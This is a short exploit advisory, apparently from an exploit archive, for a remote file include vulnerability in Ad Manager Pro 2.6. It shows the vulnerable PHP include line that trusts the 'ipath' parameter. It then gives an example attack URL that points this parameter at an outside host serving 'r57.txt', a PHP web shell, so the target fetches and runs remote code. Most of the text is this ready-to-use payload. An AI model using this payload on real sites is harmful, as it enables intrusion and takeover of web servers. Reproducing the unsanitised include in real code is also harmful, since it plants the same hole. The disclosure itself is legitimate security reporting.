id: 525
date: 06/16/2006
title: Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability
author: Basti
cves: 

============================================================
Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability
============================================================



Ad Manager Pro 2.6 Remote File Include Vulnerability

homepage: phpwebscripts.com

Affected files: ad.php and common.php

Credit: Basti

Vulnerable Code:
if ($ipath) include($ipath.'/common.php'); else include('./common.php');

Example:
http://[site]/admanagerpro/common.php?ipath=http://site/r57.txt?




#  0day.today [2023-03-23]  #